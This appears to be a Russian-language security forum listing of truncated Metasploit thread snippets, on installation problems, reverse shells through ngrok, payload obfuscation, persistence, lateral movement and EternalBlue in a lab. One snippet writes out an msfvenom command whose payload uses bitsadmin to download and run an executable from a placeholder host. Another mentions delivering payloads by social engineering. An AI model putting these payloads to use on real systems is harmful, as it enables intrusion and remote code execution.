metasploit

Здравствуйте, хотел бы узнать, как добавить exploit в metasploit. Пытался добавить через /root/.mfs4/modules/exploit/remote но не видит. Как например данный эксплотит добавить в metasploit ? На форуме ничего не нашел

Здравствуйте. Столкнулся впервые с такой проблемой sh: 0: getcwd() failed: No such file or directory sh: 0: getcwd() failed: No such file or directory [!] There was an error parsing `Gemfile`: No such file or directory - getcwd. Bundler cannot continue. # from...

upd 04.08.2021 - метод больше не работает тема закрыта Привет, сегодня я расскажу про установку Metasploit-Framework на твое Android-устройство. На сегодняшний день, Metasploit является одним из лучших инструментов пентеста. В нем собранно несколько тысяч эксплоитов и не только. С его помощью...

В предыдущей статье из серии профессиональных инструментов для аудита безопасности, мы загрузили и установили Metasploit. Теперь, мы начнем адаптироваться к Metasploit Framework и будем делать маленькие шаги чтобы инициировать наш первый настоящий взлом. Прежде чем мы начнем аудит безопасности...

Всем привет, я уже не первую неделю борюсь с проблемой обфускации смали кода reverse tcp и именно бесступенчатого реверса. В Evil-Droid есть вариант создания бесступенчатого реверса и его обфускации, но по каким то причинам это не работает (подозреваю что из за обновления метасплоита), так вот...

Всем доброго времени, при генерирование нагрузки в msfvenom , пэйлоадом windows/x64/exec с параметрами cmd="bitsadmin /transfer myjob /download /priority high https://mylink.com c:\myfile.exe&start myfile.exe" -f exe -o file.exe, при запуске на windows 10 x64, на доли секунды открывается окошко...

Привет codeby.net! Сегодня я вам покажу как можно получить обратное подключение без прокидывание портов и лишнего геморроя. Для реализации обратного подключения нам понадобиться metasploit и ngrok. Metasploit - проект, посвящённый информационной безопасности. Создан для предоставления...

Всем привет! Имею огромное желание найти друзей в сфере ИБ и пентеста. Я верю что нужно оружать себя правильными друзьями с такими же целями и мечтами как у тебя . Если ты с ДВ - отзовись :)

Приветствую всех форумчан! Есть вопрос по поводу метасплоита, а именно. Использую модуль auxiliary(scanner/http/crawler) Как только сайт на https - отказывается сканить. Все установки указываю как положено, порт и SSL. Http работает отлично. В чем может быть проблема?

Только не нужно советовать видеокурс Этичный хакинг, я про него итак знаю, да и там рассказывается обо всем. А я хочу посмотреть какой то курс чисто по эксплоитам, по работе с метасплоитом в линуксе и тд. Желательно с русским переводом. Книги тоже подойдут если годные

Совместная работа команды Поддержка мульти-пользователей предоставляет вам возможность сотрудничать с другими членами команды. Вы и ваша команда можете использовать один и тот же экземпляр Metasploit Pro для выполнения задач, просмотра данных, а также обмена проектами. Вы можете получить доступ...

Друзья, подскажите, думаю многим пригодится В инете что не сервер, то новая инструкция, + разные оболочки с настойками Посоветуйте, как не напороть косяков! Грамотно установить оболочку, не инсталируя лишнего, что б не вызвать конфликтов. И главное как им (сервером) управлять в графическом...

Доброго времени господа pentesterы! Я прошу просвещения! Раньше , для получения meterpretera я генерил payload c помощью FATRAT и с помощью СИ доставлял его на целевую машину, а с помощью ngrok ловил реверс. Сейчас же я его не заливаю на целевой ПК , а задаю следующие параметры на своей машине...

Добрейший денечек/вечерочек, нужна ваша хелп. итак, без прилюдий сразу к делу. все мои действия по порядку : 1. качаю termux из Play Market 2. apt upgrade 3. apt install curl 4. curl -LO и вот тута я стопарюсь из-за ошибочки, мол не знает он такой опции. возможно дело во мне (что скорее...

Иногда довольно сложно удержать доступ к машине жертвы после успешного проникновения, особенно если нет возможности выполнить вредоносный код от имени администратора или создать и добавить пользователя в привилегированную группу. Сегодня хотел бы поговорить о методе пост эксплуатации под...

Добрый день! У меня возник вопрос как после попадания на один ПК в сети проникнуть и в другие ПК это сети ? Вопрос меня сильно волнует но не знаю как это воспроизвести. Делаю реферат на тему "Уязвимости ПК" с демонстрацией)

В локалке имеется машинка Win7 SP1 x86 (192.168.1.106) И Kali linux (192.168.1.103) на которую установлен Metasploit-Framework с добавленным модулем exploit/windows/smb/eternalblue_doublepulsar. Сканирую виндовую машину с помощью auxiliary/scaner/smb/smb_ms17_010: Делаю вывод, что машинка...

При попытке подключиться к нему (через другую ОС) - выдаёт ошибку, будто он выключен (The connection has timed out). Не могу понять, что не так настроил в настроках "Сеть", в Вирт.Боксе. Может кто знает какие настройки нужны?

Здравствуйте. Есть ли в интернете примеры реализаций атак на scada системы, ПЛК, асу тп? Если это можно реализовать в метасплоите, то как? И какие системы защиты на данный момент есть для АСУ ТП. Спасибо.

Сразу скажу опыта в этом нет никакого и вот я экспериментирую над своим компом. В общем посмотрел видосики как с мобилы ломануть комп и понеслась .... установил Termux потом Metasploit..... В общем прогресс дошел до того, что в метаэксплоите использую данную уязвимость и подключаюсь к командной...